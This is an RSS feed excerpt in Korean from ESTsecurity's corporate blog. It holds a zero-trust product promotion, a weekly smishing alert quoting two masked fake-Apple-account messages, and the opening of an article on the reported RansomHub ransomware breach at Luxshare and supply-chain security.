&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;제로트러스트 거버넌스 구축, 어디서부터 시작해야 할까요?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;많은 기업이 제로트러스트 도입을 고민하면서도 '어디서부터 시작해야 할지' 막연함을 느낍니다. 기술은 빠르게 발전하지만, 조직에 맞는 적용 순서와 범위를 정하는 일은 쉽지 않기 때문입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이스트시큐리티의 &lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-zepp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;알약 ZePP&lt;/b&gt;&lt;/a&gt;는 기술 도입이 아닌 보안 운영 체계의 전환을 함께 지원합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt;&lt;b&gt;  현재 보안 환경 진단 및 제로트러스트 성숙도 평가&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt;&lt;b&gt;  조직 특성에 맞춘 단계별 적용 로드맵 제시&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333;&quot;&gt;&lt;b&gt;  정책 설계부터 운영 자동화까지 통합 지원&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트는 더 이상 먼 미래의 이야기가 아닙니다. 지금 이 순간에도 많은 기업이 거버넌스 기반 제로트러스트 체계를 구축하며 보안 운영의 새로운 기준을 만들어가고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;제로트러스트 거버넌스 구축이 고민되신다면, &lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;아래 도입 상담을 통해 지금 우리 조직에 맞는 적용 방안을 확인해 보시기 바랍니다.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/A1vLE/dJMcaf6wLJY/uKvYx4CRKTkKm74erdPTD0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FA1vLE%2FdJMcaf6wLJY%2FuKvYx4CRKTkKm74erdPTD0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;74&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>거버넌스</category>
      <category>기업보안</category>
      <category>보안거버넌스</category>
      <category>보안운영</category>
      <category>알약ZePP</category>
      <category>엔드포인트보안</category>
      <category>이스트시큐리티</category>
      <category>제로트러스트</category>
      <category>제로트러스트보안</category>
      <category>통합보안</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5712</guid>
      <comments>https://alyacofficialblog.tistory.com/5712#entry5712comment</comments>
      <pubDate>Mon, 2 Feb 2026 15:56:31 +0900</pubDate>
    </item>
    <item>
      <title>[국외발신] [Apple] 귀하의 계정이 다른 장소에서 로그인되고 있습니다. 확인해주세요. app****.cc</title>
      <link>https://alyacofficialblog.tistory.com/5711</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kPfhz/dJMcahcaFUn/DOFl80ReeIKJlcSBfkkLak/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kPfhz/dJMcahcaFUn/DOFl80ReeIKJlcSBfkkLak/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kPfhz/dJMcahcaFUn/DOFl80ReeIKJlcSBfkkLak/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkPfhz%2FdJMcahcaFUn%2FDOFl80ReeIKJlcSBfkkLak%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;[1월 다섯째주]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;알약&amp;nbsp;스미싱&amp;nbsp;알림&amp;nbsp;본&amp;nbsp;포스트는&amp;nbsp;알약M&amp;nbsp;사용자&amp;nbsp;분들이&amp;nbsp;'신고하기'&amp;nbsp;기능을&amp;nbsp;통해&amp;nbsp;알약으로&amp;nbsp;신고해&amp;nbsp;주신&amp;nbsp;스미싱&amp;nbsp;내역&amp;nbsp;중&amp;nbsp;'특이&amp;nbsp;문자'를&amp;nbsp;자체&amp;nbsp;수집,&amp;nbsp;집계하여&amp;nbsp;제공해&amp;nbsp;드리는&amp;nbsp;정보성&amp;nbsp;포스트입니다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;특이 문자&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;color: #333333; text-align: start;&quot;&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 63px;&quot; border=&quot;1&quot; data-ke-style=&quot;style14&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center; height: 21px;&quot;&gt;No.&lt;/td&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center; height: 21px;&quot;&gt;문자내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center; height: 21px;&quot;&gt;1&lt;/td&gt;
&lt;td style=&quot;height: 21px;&quot;&gt;[국외발신]귀하의 Apple ID 계정에 이상이 있습니다. 확인해 주세요. ap****-kr.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center; height: 21px;&quot;&gt;2&lt;/td&gt;
&lt;td style=&quot;background-color: #f9f9f9; height: 21px;&quot;&gt;[국외발신] [Apple] 귀하의 계정이 다른 장소에서 로그인되고 있습니다. 확인해주세요. app****.cc&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span data-phocus=&quot;https://blog.kakaocdn.net/dna/cyPdX2/dJMcajnq8Vw/AAAAAAAAAAAAAAAAAAAAAMNR9eI-n1grAoxR_JZX4AuVqHzLRBRVVIFFIIBZUpoh/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&amp;amp;expires=1769871599&amp;amp;allow_ip=&amp;amp;allow_referer=&amp;amp;signature=EZM61uDmDWBVYerXyuDbnN0eCR0%3D&quot; data-url=&quot;https://blog.kakaocdn.net/dna/cyPdX2/dJMcajnq8Vw/AAAAAAAAAAAAAAAAAAAAAMNR9eI-n1grAoxR_JZX4AuVqHzLRBRVVIFFIIBZUpoh/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&amp;amp;expires=1769871599&amp;amp;allow_ip=&amp;amp;allow_referer=&amp;amp;signature=EZM61uDmDWBVYerXyuDbnN0eCR0%3D&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bnmv74/dJMcaihRmm8/K9alyVLWqkuKINoEsf4O31/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bnmv74/dJMcaihRmm8/K9alyVLWqkuKINoEsf4O31/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bnmv74/dJMcaihRmm8/K9alyVLWqkuKINoEsf4O31/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbnmv74%2FdJMcaihRmm8%2FK9alyVLWqkuKINoEsf4O31%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처&amp;nbsp;:&amp;nbsp;알약M&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;기간 : 2026년 1월 24일 ~ 2025년 1월 30일&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>안전한 PC&amp;amp;모바일 세상/스미싱 알림</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5711</guid>
      <comments>https://alyacofficialblog.tistory.com/5711#entry5711comment</comments>
      <pubDate>Fri, 30 Jan 2026 13:29:10 +0900</pubDate>
    </item>
    <item>
      <title>공급망 보안이 무너지면, 모두가 무너진다! 럭스쉐어(Luxshare) 해킹 사고가 던진 경고</title>
      <link>https://alyacofficialblog.tistory.com/5710</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;글로벌 전자제품 위탁 생산 기업, 럭스쉐어(Luxshare) 가 랜섬웨어 공격을 받아 대규모 정보 유출 사고를 겪었습니다. 이번 공격의 파급력은 단일 기업의 피해를 넘어, 애플&amp;middot;엔비디아&amp;middot;테슬라 등 글로벌 빅테크 기업들까지 직접적인 보안 위협에 노출시켰다는 점에서 업계 전반에 큰 충격을 주고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 사고는 기업 보안의 최종 방어선은 결국 공급망이라는 사실을 다시 한번 명확히 보여주는 사례입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384087.png&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;743&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yPbwv/dJMcadt2jib/YxhYja2ftOrGNK3vnKKaG0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yPbwv/dJMcadt2jib/YxhYja2ftOrGNK3vnKKaG0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yPbwv/dJMcadt2jib/YxhYja2ftOrGNK3vnKKaG0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FyPbwv%2FdJMcadt2jib%2FYxhYja2ftOrGNK3vnKKaG0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1300&quot; height=&quot;743&quot; data-filename=&quot;Group 2034384087.png&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;743&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;협력사 보안 붕괴로 인한 빅테크 핵심 자산 노출&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;해외 보안 전문 매체 CPO Magazine에 따르면, 럭스쉐어는 랜섬웨어 조직 'RansomHub'의 공격을 받아 내부 데이터가 암호화됐으며, 공격자는 이를 빌미로 협상을 요구하고 있습니다. 협상이 결렬될 경우, 탈취한 기밀 정보를 공개하겠다고 위협하며 고객사까지 압박하는 전형적인 이중 협박(Double Extortion) 수법을 사용한 것으로 알려졌습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문제는 유출된 데이터의 성격입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;미발표 제품의 3D CAD 모델, 회로도, 엔지니어링 문서뿐만 아니라 수년간 협업해 온 인력들의 개인정보까지 포함&lt;/b&gt;된 것으로 전해졌습니다. 이는 단순한 데이터 유출을 넘어, 산업 스파이 활동이나 위조품 제작, 기술 경쟁력 훼손으로 이어질 수 있는 매우 치명적인 사안입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;럭스쉐어 해킹 사고의 위험성 분석&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 럭스쉐어 해킹 사고가 특히 심각하게 받아들여지는 이유는 세 가지입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;첫째, 공격 대상이 글로벌 제조 공급망의 핵심 노드였다는 점&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;빅테크 기업들은 내부 보안 투자를 강화해 왔지만, 협력사&amp;middot;위탁 생산 기업의 보안 수준까지 동일하게 관리하기는 쉽지 않습니다. 공격자는 바로 이 &amp;lsquo;연결 지점&amp;rsquo;을 노렸습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;둘째, 유출된 정보의 수명이 매우 길다는 점&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;설계도와 기술 문서는 단기간에 가치가 소멸되지 않습니다. 향후 수년간 글로벌 시장에서 경쟁 우위를 약화시키는 요소로 작용할 가능성이 큽니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;셋째, 고객사까지 직접 협박 대상으로 삼았다는 점&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이는 공급망 공격이 단순한 간접 피해를 넘어, 최종 기업의 의사결정과 평판까지 흔들 수 있음을 보여줍니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 사건은 모든 기업들에게 분명한 메시지를 주고 있습니다. &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;아무리 내부 보안 체계가 견고하더라도, 공급망 파트너 중 단 한 곳이라도 취약하다면 전체 생태계가 위험해질 수 있다는 점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 제조&amp;middot;IT&amp;middot;플랫폼 기업처럼 다수의 협력사와 설계&amp;middot;데이터를 공유하는 환경에서는, 공급망 보안이 곧 기업 보안의 수준을 결정합니다. 이제 보안은 &amp;lsquo;우리 조직 내부&amp;rsquo;만의 문제가 아니라, 연결된 모든 조직을 전제로 설계돼야 하는 문제가 되었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;기업 보안 전략의 핵심 요소로서의 공급망 보안&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;럭스쉐어 해킹 사고는 단일 기업의 침해 사례를 넘어, &lt;span&gt;기업 보안 전략의 관점 자체를 다시 보게 만드는 사건&lt;/span&gt;입니다. 아무리 내부 보안 체계를 강화하더라도, 설계&amp;middot;제조&amp;middot;협업 과정에서 연결된 공급망 중 한 곳이라도 취약하다면 핵심 자산과 미래 제품 로드맵은 언제든 노출될 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이제 공급망 보안은 보안 부서의 개별 과제가 아니라, &lt;span&gt;기업 차원의 전략적 판단 영역&lt;/span&gt;으로 이동하고 있습니다. 어떤 파트너와 어떤 방식으로 기술 자산을 공유할 것인지, 협력사 환경까지 포함해 어디까지를 동일한 보안 기준으로 관리할 것인지에 대한 명확한 기준 없이는, 공급망 리스크를 구조적으로 통제하기 어렵습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;결국 기업 보안 전략에서 중요한 것은 하나의 질문으로 정리됩니다.&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;공급망을 포함한 전체 협업 구조 안에서, 우리 기업의 핵심 자산을 통제할 수 있는가.&lt;/b&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;제조업 기업이 지금 점검해야 할 공급망 보안 포인트&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 럭스쉐어 해킹 사고는 제조업 기업에게 특히 직접적인 시사점을 던집니다. 설계도, 도면, 공정 자료, 협력사 공유 문서 등 제조업의 핵심 경쟁력은 대부분 디지털 파일 형태로 협력사와 공유되고 있기 때문입니다. 이 과정에서 단 한 곳의 보안 공백만 발생해도, 공격자는 전체 공급망을 관통하는 치명적인 침투 경로를 확보하게 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
